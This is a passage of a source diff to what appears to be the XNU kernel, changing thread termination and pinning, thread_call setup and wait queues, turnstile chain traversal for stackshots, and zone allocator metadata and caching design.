us to block. */ - integer_t decompressions; /* Per-thread decompressions counter to be added to per-task decompressions counter */ - int thread_region_page_shift; /* Page shift that this thread would like to use when */ - /* introspecting a task. This is currently being used */ - /* by footprint which uses a thread for each task being inspected. */ + turnstile_update_flags_t inheritor_flags; /* inheritor flags for inheritor field */ + block_hint_t pending_block_hint; + block_hint_t block_hint; /* What type of primitive last caused us to block. 
*/ + integer_t decompressions; /* Per-thread decompressions counter to be added to per-task decompressions counter */ + int thread_region_page_shift; /* Page shift that this thread would like to use when */ + /* introspecting a task. This is currently being used */ + /* by footprint which uses a thread for each task being inspected. */ }; #define ith_state saved.receive.state @@ -740,8 +742,14 @@ extern void thread_read_deallocate( extern void thread_terminate_self(void); +__options_decl(thread_terminate_options_t, uint32_t, { + TH_TERMINATE_OPTION_NONE, + TH_TERMINATE_OPTION_UNPIN +}); + extern kern_return_t thread_terminate_internal( - thread_t thread); + thread_t thread, + thread_terminate_options_t options); extern void thread_start( thread_t thread) __attribute__ ((noinline)); @@ -1067,10 +1075,18 @@ extern kern_return_t thread_create_with_continuation( thread_t *new_thread, thread_continue_t continuation); -extern kern_return_t thread_create_waiting(task_t task, - thread_continue_t continuation, - event_t event, - thread_t *new_thread); +/* thread_create_waiting options */ +__options_decl(th_create_waiting_options_t, uint32_t, { + TH_CREATE_WAITING_OPTION_PINNED = 0x10, + TH_CREATE_WAITING_OPTION_IMMOVABLE = 0x20, +}); +#define TH_CREATE_WAITING_OPTION_MASK 0x30 + +extern kern_return_t thread_create_waiting(task_t task, + thread_continue_t continuation, + event_t event, + th_create_waiting_options_t options, + thread_t *new_thread); extern kern_return_t thread_create_workq_waiting( task_t task, @@ -1381,6 +1397,7 @@ void thread_clear_eager_preempt(thread_t thread); void thread_set_honor_qlimit(thread_t thread); void thread_clear_honor_qlimit(thread_t thread); extern ipc_port_t convert_thread_to_port(thread_t); +extern ipc_port_t convert_thread_to_port_pinned(thread_t); extern ipc_port_t convert_thread_inspect_to_port(thread_inspect_t); extern ipc_port_t convert_thread_read_to_port(thread_read_t); extern boolean_t is_vm_privileged(void); @@ -1391,6 +1408,9 @@ 
extern void thread_iokit_tls_set(uint32_t index, void * data); extern void thread_port_with_flavor_notify(mach_msg_header_t *msg); extern int thread_self_region_page_shift(void); extern void thread_self_region_page_shift_set(int pgshift); +extern kern_return_t thread_create_pinned(task_t task, thread_t *new_thread); +extern kern_return_t thread_create_immovable(task_t task, thread_t *new_thread); +extern kern_return_t thread_terminate_pinned(thread_t thread); #endif /* KERNEL_PRIVATE */ __END_DECLS diff --git a/osfmk/kern/thread_act.c b/osfmk/kern/thread_act.c index ccfb5eb3d..679c11621 100644 --- a/osfmk/kern/thread_act.c +++ b/osfmk/kern/thread_act.c @@ -157,9 +157,11 @@ thread_start_in_assert_wait( */ kern_return_t thread_terminate_internal( - thread_t thread) + thread_t thread, + thread_terminate_options_t options) { kern_return_t result = KERN_SUCCESS; + boolean_t test_pin_bit = false; thread_mtx_lock(thread); @@ -173,6 +175,8 @@ thread_terminate_internal( } else { thread_start(thread); } + /* This bit can be reliably tested only if the thread is still active */ + test_pin_bit = (options == TH_TERMINATE_OPTION_UNPIN) ? true : false; } else { result = KERN_TERMINATED; } @@ -181,6 +185,13 @@ thread_terminate_internal( thread_affinity_terminate(thread); } + /* + * thread_terminate shouldn't be allowed on pthread + * Until thread_terminate is disallowed for pthreads, always unpin the pinned port + * when the thread is being terminated. + */ + ipc_thread_port_unpin(thread->ith_self, test_pin_bit); + thread_mtx_unlock(thread); if (thread != current_thread() && result == KERN_SUCCESS) { @@ -206,7 +217,7 @@ thread_terminate( return KERN_FAILURE; } - kern_return_t result = thread_terminate_internal(thread); + kern_return_t result = thread_terminate_internal(thread, TH_TERMINATE_OPTION_NONE); /* * If a kernel thread is terminating itself, force handle the APC_AST here. 
@@ -225,6 +236,20 @@ thread_terminate( return result; } +kern_return_t +thread_terminate_pinned( + thread_t thread) +{ + if (thread == THREAD_NULL) { + return KERN_INVALID_ARGUMENT; + } + + assert(thread->task != kernel_task); + + kern_return_t result = thread_terminate_internal(thread, TH_TERMINATE_OPTION_UNPIN); + return result; +} + /* * Suspend execution of the specified thread. * This is a recursive-style suspension of the thread, a count of diff --git a/osfmk/kern/thread_call.c b/osfmk/kern/thread_call.c index afe86a612..6bcca3720 100644 --- a/osfmk/kern/thread_call.c +++ b/osfmk/kern/thread_call.c @@ -56,8 +56,6 @@ static ZONE_DECLARE(thread_call_zone, "thread_call", sizeof(thread_call_data_t), ZC_NOENCRYPT); -static struct waitq daemon_waitq; - typedef enum { TCF_ABSOLUTE = 0, TCF_CONTINUOUS = 1, @@ -92,6 +90,8 @@ static struct thread_call_group { uint32_t target_thread_count; thread_call_group_flags_t tcg_flags; + + struct waitq waiters_waitq; } thread_call_groups[THREAD_CALL_INDEX_MAX] = { [THREAD_CALL_INDEX_HIGH] = { .tcg_name = "high", @@ -458,6 +458,8 @@ thread_call_group_setup(thread_call_group_t group) timer_call_setup(&group->dealloc_timer, thread_call_dealloc_timer, group); + waitq_init(&group->waiters_waitq, SYNC_POLICY_DISABLE_IRQ); + /* Reverse the wait order so we re-use the most recently parked thread from the pool */ waitq_init(&group->idle_waitq, SYNC_POLICY_REVERSED | SYNC_POLICY_DISABLE_IRQ); } @@ -530,23 +532,57 @@ thread_call_initialize(void) } void -thread_call_setup( +thread_call_setup_with_options( thread_call_t call, thread_call_func_t func, - thread_call_param_t param0) + thread_call_param_t param0, + thread_call_priority_t pri, + thread_call_options_t options) { bzero(call, sizeof(*call)); *call = (struct thread_call) { .tc_func = func, .tc_param0 = param0, - - /* - * Thread calls default to the HIGH group - * unless otherwise specified. 
- */ - .tc_index = THREAD_CALL_INDEX_HIGH, }; + + switch (pri) { + case THREAD_CALL_PRIORITY_HIGH: + call->tc_index = THREAD_CALL_INDEX_HIGH; + break; + case THREAD_CALL_PRIORITY_KERNEL: + call->tc_index = THREAD_CALL_INDEX_KERNEL; + break; + case THREAD_CALL_PRIORITY_USER: + call->tc_index = THREAD_CALL_INDEX_USER; + break; + case THREAD_CALL_PRIORITY_LOW: + call->tc_index = THREAD_CALL_INDEX_LOW; + break; + case THREAD_CALL_PRIORITY_KERNEL_HIGH: + call->tc_index = THREAD_CALL_INDEX_KERNEL_HIGH; + break; + default: + panic("Invalid thread call pri value: %d", pri); + break; + } + + if (options & THREAD_CALL_OPTIONS_ONCE) { + call->tc_flags |= THREAD_CALL_ONCE; + } + if (options & THREAD_CALL_OPTIONS_SIGNAL) { + call->tc_flags |= THREAD_CALL_SIGNAL | THREAD_CALL_ONCE; + } +} + +void +thread_call_setup( + thread_call_t call, + thread_call_func_t func, + thread_call_param_t param0) +{ + thread_call_setup_with_options(call, func, param0, + THREAD_CALL_PRIORITY_HIGH, 0); } static void @@ -592,8 +628,8 @@ _internal_call_allocate(thread_call_func_t func, thread_call_param_t param0) thread_call_internal_queue_count--; thread_call_setup(call, func, param0); - call->tc_refs = 0; - call->tc_flags = 0; /* THREAD_CALL_ALLOC not set, do not free back to zone */ + /* THREAD_CALL_ALLOC not set, do not free back to zone */ + assert((call->tc_flags & THREAD_CALL_ALLOC) == 0); enable_ints_and_unlock(group, s); return call; @@ -953,35 +989,11 @@ thread_call_allocate_with_options( thread_call_priority_t pri, thread_call_options_t options) { - thread_call_t call = thread_call_allocate(func, param0); - - switch (pri) { - case THREAD_CALL_PRIORITY_HIGH: - call->tc_index = THREAD_CALL_INDEX_HIGH; - break; - case THREAD_CALL_PRIORITY_KERNEL: - call->tc_index = THREAD_CALL_INDEX_KERNEL; - break; - case THREAD_CALL_PRIORITY_USER: - call->tc_index = THREAD_CALL_INDEX_USER; - break; - case THREAD_CALL_PRIORITY_LOW: - call->tc_index = THREAD_CALL_INDEX_LOW; - break; - case 
THREAD_CALL_PRIORITY_KERNEL_HIGH: - call->tc_index = THREAD_CALL_INDEX_KERNEL_HIGH; - break; - default: - panic("Invalid thread call pri value: %d", pri); - break; - } + thread_call_t call = zalloc(thread_call_zone); - if (options & THREAD_CALL_OPTIONS_ONCE) { - call->tc_flags |= THREAD_CALL_ONCE; - } - if (options & THREAD_CALL_OPTIONS_SIGNAL) { - call->tc_flags |= THREAD_CALL_SIGNAL | THREAD_CALL_ONCE; - } + thread_call_setup_with_options(call, func, param0, pri, options); + call->tc_refs = 1; + call->tc_flags |= THREAD_CALL_ALLOC; return call; } @@ -1039,13 +1051,8 @@ thread_call_allocate( thread_call_func_t func, thread_call_param_t param0) { - thread_call_t call = zalloc(thread_call_zone); - - thread_call_setup(call, func, param0); - call->tc_refs = 1; - call->tc_flags = THREAD_CALL_ALLOC; - - return call; + return thread_call_allocate_with_options(func, param0, + THREAD_CALL_PRIORITY_HIGH, 0); } /* @@ -1422,7 +1429,7 @@ thread_call_wake( if (group->idle_count) { __assert_only kern_return_t kr; - kr = waitq_wakeup64_one(&group->idle_waitq, NO_EVENT64, + kr = waitq_wakeup64_one(&group->idle_waitq, CAST_EVENT64_T(group), THREAD_AWAKENED, WAITQ_ALL_PRIORITIES); assert(kr == KERN_SUCCESS); @@ -1438,7 +1445,7 @@ thread_call_wake( if (thread_call_group_should_add_thread(group) && os_atomic_cmpxchg(&thread_call_daemon_awake, false, true, relaxed)) { - waitq_wakeup64_all(&daemon_waitq, NO_EVENT64, + waitq_wakeup64_all(&daemon_waitq, CAST_EVENT64_T(&thread_call_daemon_awake), THREAD_AWAKENED, WAITQ_ALL_PRIORITIES); } } @@ -1498,10 +1505,11 @@ thread_call_finish(thread_call_t call, thread_call_group_t group, spl_t *s) bool repend = false; bool signal = call->tc_flags & THREAD_CALL_SIGNAL; + bool alloc = call->tc_flags & THREAD_CALL_ALLOC; call->tc_finish_count++; - if (!signal) { + if (!signal && alloc) { /* The thread call thread owns a ref until the call is finished */ if (call->tc_refs <= 0) { panic("thread_call_finish: detected over-released thread call: %p", call); 
@@ -1512,7 +1520,8 @@ thread_call_finish(thread_call_t call, thread_call_group_t group, spl_t *s) thread_call_flags_t old_flags = call->tc_flags; call->tc_flags &= ~(THREAD_CALL_RESCHEDULE | THREAD_CALL_RUNNING | THREAD_CALL_WAIT); - if (call->tc_refs != 0 && (old_flags & THREAD_CALL_RESCHEDULE) != 0) { + if ((!alloc || call->tc_refs != 0) && + (old_flags & THREAD_CALL_RESCHEDULE) != 0) { assert(old_flags & THREAD_CALL_ONCE); thread_call_flavor_t flavor = thread_call_get_flavor(call); @@ -1541,7 +1550,7 @@ thread_call_finish(thread_call_t call, thread_call_group_t group, spl_t *s) } } - if (!signal && (call->tc_refs == 0)) { + if (!signal && alloc && call->tc_refs == 0) { if ((old_flags & THREAD_CALL_WAIT) != 0) { panic("Someone waiting on a thread call that is scheduled for free: %p\n", call->tc_func); } @@ -1557,12 +1566,19 @@ thread_call_finish(thread_call_t call, thread_call_group_t group, spl_t *s) if ((old_flags & THREAD_CALL_WAIT) != 0) { /* - * Dropping lock here because the sched call for the - * high-pri group can take the big lock from under - * a thread lock. + * This may wake up a thread with a registered sched_call. + * That call might need the group lock, so we drop the lock + * to avoid deadlocking. + * + * We also must use a separate waitq from the idle waitq, as + * this path goes waitq lock->thread lock->group lock, but + * the idle wait goes group lock->waitq_lock->thread_lock. 
*/ thread_call_unlock(group); - thread_wakeup((event_t)call); + + waitq_wakeup64_all(&group->waiters_waitq, CAST_EVENT64_T(call), + THREAD_AWAKENED, WAITQ_ALL_PRIORITIES); + thread_call_lock_spin(group); /* THREAD_CALL_SIGNAL call may have been freed */ } @@ -1668,9 +1684,20 @@ thread_call_thread( */ bool needs_finish = false; if (call->tc_flags & THREAD_CALL_ALLOC) { + call->tc_refs++; /* Delay free until we're done */ + } + if (call->tc_flags & (THREAD_CALL_ALLOC | THREAD_CALL_ONCE)) { + /* + * If THREAD_CALL_ONCE is used, and the timer wasn't + * THREAD_CALL_ALLOC, then clients swear they will use + * thread_call_cancel_wait() before destroying + * the thread call. + * + * Else, the storage for the thread call might have + * disappeared when thread_call_invoke() ran. + */ needs_finish = true; call->tc_flags |= THREAD_CALL_RUNNING; - call->tc_refs++; /* Delay free until we're done */ } thc_state.thc_call = call; @@ -1699,7 +1726,7 @@ thread_call_thread( s = disable_ints_and_lock(group); if (needs_finish) { - /* Release refcount, may free */ + /* Release refcount, may free, may temporarily drop lock */ thread_call_finish(call, group, &s); } } @@ -1740,7 +1767,7 @@ thread_call_thread( } /* Wait for more work (or termination) */ - wres = waitq_assert_wait64(&group->idle_waitq, NO_EVENT64, THREAD_INTERRUPTIBLE, 0); + wres = waitq_assert_wait64(&group->idle_waitq, CAST_EVENT64_T(group), THREAD_INTERRUPTIBLE, 0); if (wres != THREAD_WAITING) { panic("kcall worker unable to assert wait?"); } @@ -1752,7 +1779,7 @@ thread_call_thread( if (group->idle_count < group->target_thread_count) { group->idle_count++; - waitq_assert_wait64(&group->idle_waitq, NO_EVENT64, THREAD_UNINT, 0); /* Interrupted means to exit */ + waitq_assert_wait64(&group->idle_waitq, CAST_EVENT64_T(group), THREAD_UNINT, 0); /* Interrupted means to exit */ enable_ints_and_unlock(group, s); @@ -1815,7 +1842,7 @@ thread_call_daemon_continue(__unused void *arg) } } while 
(os_atomic_load(&thread_call_daemon_awake, relaxed)); - waitq_assert_wait64(&daemon_waitq, NO_EVENT64, THREAD_UNINT, 0); + waitq_assert_wait64(&daemon_waitq, CAST_EVENT64_T(&thread_call_daemon_awake), THREAD_UNINT, 0); if (os_atomic_load(&thread_call_daemon_awake, relaxed)) { clear_wait(current_thread(), THREAD_AWAKENED); @@ -2025,7 +2052,7 @@ thread_call_dealloc_timer( if (now > group->idle_timestamp + thread_call_dealloc_interval_abs) { terminated = true; group->idle_count--; - res = waitq_wakeup64_one(&group->idle_waitq, NO_EVENT64, + res = waitq_wakeup64_one(&group->idle_waitq, CAST_EVENT64_T(group), THREAD_INTERRUPTED, WAITQ_ALL_PRIORITIES); if (res != KERN_SUCCESS) { panic("Unable to wake up idle thread for termination?"); @@ -2066,6 +2093,11 @@ thread_call_dealloc_timer( * * Takes the thread call lock locked, returns unlocked * This lets us avoid a spurious take/drop after waking up from thread_block + * + * This thread could be a thread call thread itself, blocking and therefore making a + * sched_call upcall into the thread call subsystem, needing the group lock. + * However, we're saved from deadlock because the 'block' upcall is made in + * thread_block, not in assert_wait. 
*/ static bool thread_call_wait_once_locked(thread_call_t call, spl_t s) @@ -2083,7 +2115,7 @@ thread_call_wait_once_locked(thread_call_t call, spl_t s) /* call is running, so we have to wait for it */ call->tc_flags |= THREAD_CALL_WAIT; - wait_result_t res = assert_wait(call, THREAD_UNINT); + wait_result_t res = waitq_assert_wait64(&group->waiters_waitq, CAST_EVENT64_T(call), THREAD_UNINT, 0); if (res != THREAD_WAITING) { panic("Unable to assert wait: %d", res); } @@ -2162,7 +2194,9 @@ thread_call_wait_locked(thread_call_t call, spl_t s) while (call->tc_finish_count < submit_count) { call->tc_flags |= THREAD_CALL_WAIT; - wait_result_t res = assert_wait(call, THREAD_UNINT); + wait_result_t res = waitq_assert_wait64(&group->waiters_waitq, + CAST_EVENT64_T(call), THREAD_UNINT, 0); + if (res != THREAD_WAITING) { panic("Unable to assert wait: %d", res); } diff --git a/osfmk/kern/thread_call.h b/osfmk/kern/thread_call.h index 254ef28b8..1e0f2fb96 100644 --- a/osfmk/kern/thread_call.h +++ b/osfmk/kern/thread_call.h @@ -400,6 +400,13 @@ extern void thread_call_setup( thread_call_func_t func, thread_call_param_t param0); +extern void thread_call_setup_with_options( + thread_call_t call, + thread_call_func_t func, + thread_call_param_t param0, + thread_call_priority_t pri, + thread_call_options_t options); + extern void thread_call_delayed_timer_rescan_all(void); extern uint64_t thread_call_get_armed_deadline(thread_call_t call); diff --git a/osfmk/kern/thread_group.c b/osfmk/kern/thread_group.c index 147925485..ca8228f6d 100644 --- a/osfmk/kern/thread_group.c +++ b/osfmk/kern/thread_group.c @@ -812,8 +812,8 @@ thread_group_vm_add(void) thread_set_thread_group(current_thread(), thread_group_find_by_id_and_retain(THREAD_GROUP_VM), false); } -uint64_t -kdp_thread_group_get_flags(struct thread_group *tg) +uint32_t +thread_group_get_flags(struct thread_group *tg) { return tg->tg_flags; } diff --git a/osfmk/kern/thread_group.h b/osfmk/kern/thread_group.h index 
f18259bd7..c7e78d05e 100644 --- a/osfmk/kern/thread_group.h +++ b/osfmk/kern/thread_group.h @@ -91,7 +91,7 @@ cluster_type_t thread_group_recommendation(struct thread_group *tg); typedef void (*thread_group_iterate_fn_t)(void*, int, struct thread_group *); kern_return_t thread_group_iterate_stackshot(thread_group_iterate_fn_t callout, void *arg); -uint64_t kdp_thread_group_get_flags(struct thread_group *); +uint32_t thread_group_get_flags(struct thread_group *); boolean_t thread_group_smp_restricted(struct thread_group *tg); void thread_group_update_recommendation(struct thread_group *tg, cluster_type_t new_recommendation); diff --git a/osfmk/kern/turnstile.c b/osfmk/kern/turnstile.c index baa08bf27..8d98e3989 100644 --- a/osfmk/kern/turnstile.c +++ b/osfmk/kern/turnstile.c @@ -3188,59 +3188,72 @@ turnstile_stats_update( static uint64_t kdp_turnstile_traverse_inheritor_chain(struct turnstile *ts, uint64_t *flags, uint8_t *hops) { + uint8_t unknown_hops; + if (waitq_held(&ts->ts_waitq)) { *flags |= STACKSHOT_TURNSTILE_STATUS_LOCKED_WAITQ; return 0; } *hops = *hops + 1; + unknown_hops = *hops; + + /* + * If a turnstile is inheriting our priority, recurse. If we get back *exactly* UNKNOWN, + * continue on, since we may be able to give a more specific answer. To + * give an accurate hops count, we reset *hops, saving the recursive value in + * unknown_hops to use if we can't give a better answer. 
+ */ + if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_TURNSTILE) { + uint8_t pre_hops = *hops; + uint64_t ret = kdp_turnstile_traverse_inheritor_chain(ts->ts_inheritor, flags, hops); + /* + * Note that while flags is usually |=ed, we're checking with != here to + * make sure we only replace *exactly* UNKNOWN + */ + if (ret != 0 || *flags != STACKSHOT_TURNSTILE_STATUS_UNKNOWN) { + return ret; + } + /* restore original hops value, saving the new one if we fall through to unknown */ + unknown_hops = *hops; + *hops = pre_hops; + *flags = 0; + } + + if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_THREAD) { + *flags |= STACKSHOT_TURNSTILE_STATUS_THREAD; + return (uint64_t) thread_tid(ts->ts_inheritor); + } + + if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_WORKQ) { + *flags |= STACKSHOT_TURNSTILE_STATUS_WORKQUEUE; + return VM_KERNEL_UNSLIDE_OR_PERM(ts->ts_inheritor); + } /* * If we found a send turnstile, try to get the task that the turnstile's * port is in the ipc space of */ if (turnstile_is_send_turnstile(ts)) { - task_t dest_task = TASK_NULL; ipc_port_t port = (ipc_port_t)ts->ts_proprietor; if (port && ip_active(port)) { if (ip_lock_held_kdp(port)) { *flags |= STACKSHOT_TURNSTILE_STATUS_HELD_IPLOCK; - return 0; - } else { - if (port->ip_receiver_name != 0) { - if (port->ip_receiver) { - ipc_space_t space = (ipc_space_t) port->ip_receiver; - - dest_task = space->is_task; - } else { - return 0; - } - } } - } + if (port->ip_receiver_name != 0 && port->ip_receiver) { + ipc_space_t space = (ipc_space_t) port->ip_receiver; + task_t dest_task = space->is_task; - if (dest_task != TASK_NULL) { - *flags |= STACKSHOT_TURNSTILE_STATUS_BLOCKED_ON_TASK; - return pid_from_task(dest_task); + if (dest_task != TASK_NULL) { + *flags |= STACKSHOT_TURNSTILE_STATUS_BLOCKED_ON_TASK; + return pid_from_task(dest_task); + } + } } } - if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_TURNSTILE) { - return kdp_turnstile_traverse_inheritor_chain(ts->ts_inheritor, flags, hops); - } - - if 
(ts->ts_inheritor_flags & TURNSTILE_INHERITOR_THREAD) { - *flags |= STACKSHOT_TURNSTILE_STATUS_THREAD; - return (uint64_t) thread_tid(ts->ts_inheritor); - } - - if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_WORKQ) { - *flags |= STACKSHOT_TURNSTILE_STATUS_WORKQUEUE; - return VM_KERNEL_UNSLIDE_OR_PERM(ts->ts_inheritor); - } - if (turnstile_is_receive_turnstile(ts)) { ipc_port_t port = (ipc_port_t)ts->ts_proprietor; if (port && ip_active(port)) { @@ -3260,6 +3273,7 @@ kdp_turnstile_traverse_inheritor_chain(struct turnstile *ts, uint64_t *flags, ui } } + *hops = unknown_hops; *flags |= STACKSHOT_TURNSTILE_STATUS_UNKNOWN; return 0; } diff --git a/osfmk/kern/ux_handler.c b/osfmk/kern/ux_handler.c index 0329eeea6..07e60a0c1 100644 --- a/osfmk/kern/ux_handler.c +++ b/osfmk/kern/ux_handler.c @@ -58,8 +58,8 @@ * most Mach exceptions. */ -static const void *ux_handler_kobject = NULL; -SECURITY_READ_ONLY_LATE(ipc_port_t) ux_handler_port = IP_NULL; +static SECURITY_READ_ONLY_LATE(const void *) ux_handler_kobject = NULL; +SECURITY_READ_ONLY_LATE(ipc_port_t) ux_handler_port = IP_NULL; /* * init is called early in Mach initialization diff --git a/osfmk/kern/zalloc.c b/osfmk/kern/zalloc.c index 1ef23d043..9d3349911 100644 --- a/osfmk/kern/zalloc.c +++ b/osfmk/kern/zalloc.c @@ -64,6 +64,7 @@ */ #define ZALLOC_ALLOW_DEPRECATED 1 +#if !ZALLOC_TEST #include #include #include @@ -94,6 +95,7 @@ #include #include #include +#include #include /* C_SLOT_PACKED_PTR* */ #include @@ -111,13 +113,32 @@ #include #if KASAN_ZALLOC +/* + * Set to 0 to debug poisoning and ZC_ZFREE_CLEARMEM validation under kasan. + * Otherwise they are double-duty with what kasan already does. 
+ */ +#define ZALLOC_ENABLE_POISONING 0 #define ZONE_ENABLE_LOGGING 0 #elif DEBUG || DEVELOPMENT +#define ZALLOC_ENABLE_POISONING 1 #define ZONE_ENABLE_LOGGING 1 #else +#define ZALLOC_ENABLE_POISONING 1 #define ZONE_ENABLE_LOGGING 0 #endif +#if __LP64__ +#define ZALLOC_EARLY_GAPS 1 +#else +#define ZALLOC_EARLY_GAPS 0 +#endif + +#if DEBUG +#define z_debug_assert(expr) assert(expr) +#else +#define z_debug_assert(expr) (void)(expr) +#endif + extern void vm_pageout_garbage_collect(int collect); /* Returns pid of the task with the largest number of VM map entries. */ @@ -131,120 +152,277 @@ extern boolean_t memorystatus_kill_on_zone_map_exhaustion(pid_t pid); extern zone_t vm_map_entry_zone; extern zone_t vm_object_zone; -extern vm_offset_t kmapoff_kaddr; -extern unsigned int kmapoff_pgcnt; -extern unsigned int stack_total; -extern unsigned long long stack_allocs; - -/* - * The max # of elements in a chunk should fit into - * zone_page_metadata.free_count (uint16_t). - * - * Update this if the type of free_count changes. 
- */ -#define ZONE_CHUNK_MAXELEMENTS (UINT16_MAX) - -#define ZONE_PAGECOUNT_BITS 14 -/* Zone elements must fit both a next pointer and a backup pointer */ -#define ZONE_MIN_ELEM_SIZE (2 * sizeof(vm_offset_t)) +#define ZONE_MIN_ELEM_SIZE sizeof(uint64_t) #define ZONE_MAX_ALLOC_SIZE (32 * 1024) -/* per-cpu zones are special because of counters */ -#define ZONE_MIN_PCPU_ELEM_SIZE (1 * sizeof(vm_offset_t)) - -struct zone_map_range { - vm_offset_t min_address; - vm_offset_t max_address; -}; - struct zone_page_metadata { /* The index of the zone this metadata page belongs to */ - zone_id_t zm_index; - - /* - * zm_secondary_page == 0: number of pages in this run - * zm_secondary_page == 1: offset to the chunk start - */ - uint16_t zm_page_count : ZONE_PAGECOUNT_BITS; + zone_id_t zm_index : 11; - /* Whether this page is part of a chunk run */ - uint16_t zm_percpu : 1; - uint16_t zm_secondary_page : 1; + /* Whether `zm_bitmap` is an inline bitmap or a packed bitmap reference */ + uint16_t zm_inline_bitmap : 1; /* - * The start of the freelist can be maintained as a 16-bit - * offset instead of a pointer because the free elements would - * be at max ZONE_MAX_ALLOC_SIZE bytes away from the start - * of the allocation chunk. + * Zones allocate in "chunks" of zone_t::z_chunk_pages consecutive + * pages, or zpercpu_count() pages if the zone is percpu. * - * Offset from start of the allocation chunk to free element - * list head. - */ - uint16_t zm_freelist_offs; - - /* - * zm_secondary_page == 0: number of allocated elements in the chunk - * zm_secondary_page == 1: unused + * The first page of it has its metadata set with: + * - 0 if none of the pages are currently wired + * - the number of wired pages in the chunk (not scaled for percpu). * - * PAGE_METADATA_EMPTY_FREELIST indicates an empty freelist + * Other pages in the chunk have their zm_chunk_len set to + * ZM_SECONDARY_PAGE or ZM_SECONDARY_PCPU_PAGE depending on whether + * the zone is percpu or not. 
For those, zm_page_index holds the + * index of that page in the run. */ - uint16_t zm_alloc_count; -#define PAGE_METADATA_EMPTY_FREELIST UINT16_MAX + uint16_t zm_chunk_len : 4; +#define ZM_CHUNK_LEN_MAX 0x8 +#define ZM_SECONDARY_PAGE 0xe +#define ZM_SECONDARY_PCPU_PAGE 0xf + + union { +#define ZM_ALLOC_SIZE_LOCK 1u + uint16_t zm_alloc_size; /* first page only */ + uint16_t zm_page_index; /* secondary pages only */ + }; + union { + uint32_t zm_bitmap; /* most zones */ + uint32_t zm_bump; /* permanent zones */ + }; zone_pva_t zm_page_next; zone_pva_t zm_page_prev; - - /* - * This is only for the sake of debuggers - */ -#define ZONE_FOREIGN_COOKIE 0x123456789abcdef - uint64_t zm_foreign_cookie[]; }; +static_assert(sizeof(struct zone_page_metadata) == 16, "validate packing"); +__enum_closed_decl(zone_addr_kind_t, bool, { + ZONE_ADDR_FOREIGN, + ZONE_ADDR_NATIVE, +}); +#define ZONE_ADDR_KIND_COUNT 2 -/* Align elements that use the zone page list to 32 byte boundaries. */ -#define ZONE_PAGE_FIRST_OFFSET(kind) ((kind) == ZONE_ADDR_NATIVE ? 0 : 32) +/*! + * @typedef zone_element_t + * + * @brief + * Type that represents a "resolved" zone element. + * + * @description + * This type encodes an element pointer as a tuple of: + * { chunk base, element index, element protection }. + * + * The chunk base is extracted with @c trunc_page() + * as it is always page aligned, and occupies the bits above @c PAGE_SHIFT. + * + * The low two bits encode the protection mode (see @c zprot_mode_t). + * + * The other bits encode the element index in the chunk rather than its address. + */ +typedef struct zone_element { + vm_offset_t ze_value; +} zone_element_t; -static_assert(sizeof(struct zone_page_metadata) == 16, "validate packing"); +/*! + * @typedef zone_magazine_t + * + * @brief + * Magazine of cached allocations. + * + * @field zm_cur how many elements this magazine holds (unused while loaded). + * @field zm_link linkage used by magazine depots. 
+ * @field zm_elems an array of @c zc_mag_size() elements. + */ +typedef struct zone_magazine { + uint16_t zm_cur; + STAILQ_ENTRY(zone_magazine) zm_link; + zone_element_t zm_elems[0]; +} *zone_magazine_t; + +/*! + * @typedef zone_cache_t + * + * @brief + * Magazine of cached allocations. + * + * @discussion + * Below is a diagram of the caching system. This design is inspired by the + * paper "Magazines and Vmem: Extending the Slab Allocator to Many CPUs and + * Arbitrary Resources" by Jeff Bonwick and Jonathan Adams and the FreeBSD UMA + * zone allocator (itself derived from this seminal work). + * + * It is divided into 3 layers: + * - the per-cpu layer, + * - the recirculation depot layer, + * - the Zone Allocator. + * + * The per-cpu and recirculation depot layer use magazines (@c zone_magazine_t), + * which are stacks of up to @c zc_mag_size() elements. + * + *

CPU layer

+ * + * The CPU layer (@c zone_cache_t) looks like this: + * + * ╭─ a ─ f ─┬───────── zc_depot ──────────╮ + * │ ╭─╮ ╭─╮ │ ╭─╮ ╭─╮ ╭─╮ ╭─╮ ╭─╮ │ + * │ │#│ │#│ │ │#│ │#│ │#│ │#│ │#│ │ + * │ │#│ │ │ │ │#│ │#│ │#│ │#│ │#│ │ + * │ │ │ │ │ │ │#│ │#│ │#│ │#│ │#│ │ + * │ ╰─╯ ╰─╯ │ ╰─╯ ╰─╯ ╰─╯ ╰─╯ ╰─╯ │ + * ╰─────────┴─────────────────────────────╯ + * + * It has two pre-loaded magazines (a)lloc and (f)ree which we allocate from, + * or free to. Serialization is achieved through disabling preemption, and only + * the current CPU can access those allocations. This is represented on the left + * hand side of the diagram above. + * + * The right hand side is the per-cpu depot. It consists of @c zc_depot_cur + * full magazines, and is protected by the @c zc_depot_lock for access. + * The lock is expected to absolutely never be contended, as only the local CPU + * tends to access the local per-cpu depot in regular operation mode. + * + * However unlike UMA, our implementation allows for the zone GC to reclaim + * per-CPU magazines aggressively, which is serialized with the @c zc_depot_lock. + * + * 

Recirculation Depot

+ * + * The recirculation depot layer is a list similar to the per-cpu depot, + * however it is different in two fundamental ways: + * + * - it is protected by the regular zone lock, + * - elements referenced by the magazines in that layer appear free + * to the zone layer. + * + * + *

Magazine circulation and sizing

+ * + * The caching system sizes itself dynamically. Operations that allocate/free + * a single element call @c zone_lock_nopreempt_check_contention() which records + * contention on the lock by doing a trylock and recording its success. + * + * This information is stored in the @c z_contention_cur field of the zone, + * and a windowed moving average is maintained in @c z_contention_wma. + * Each time a CPU registers any contention, it will also allow its own per-cpu + * cache to grow, incrementing @c zc_depot_max, which is how the per-cpu layer + * might grow into using its local depot. + * + * Note that @c zc_depot_max assumes that the (a) and (f) pre-loaded magazines + * on average contain @c zc_mag_size() elements. + * + * When a per-cpu layer cannot hold more full magazines in its depot, + * then it will overflow about 1/3 of its depot into the recirculation depot + * (see @c zfree_cached_slow()). Conversely, when a depot is empty, then it will + * refill its per-cpu depot to about 1/3 of its size from the recirculation + * depot (see @c zalloc_cached_slow()). + * + * Lastly, the zone layer keeps track of the high and low watermark of how many + * elements have been free per period of time (including being part of the + * recirculation depot) in the @c z_elems_free_min and @c z_elems_free_max + * fields. A weighted moving average of the amplitude of this is maintained in + * the @c z_elems_free_wss which informs the zone GC on how to gently trim + * zones without hurting performance. + * + * 

Security considerations

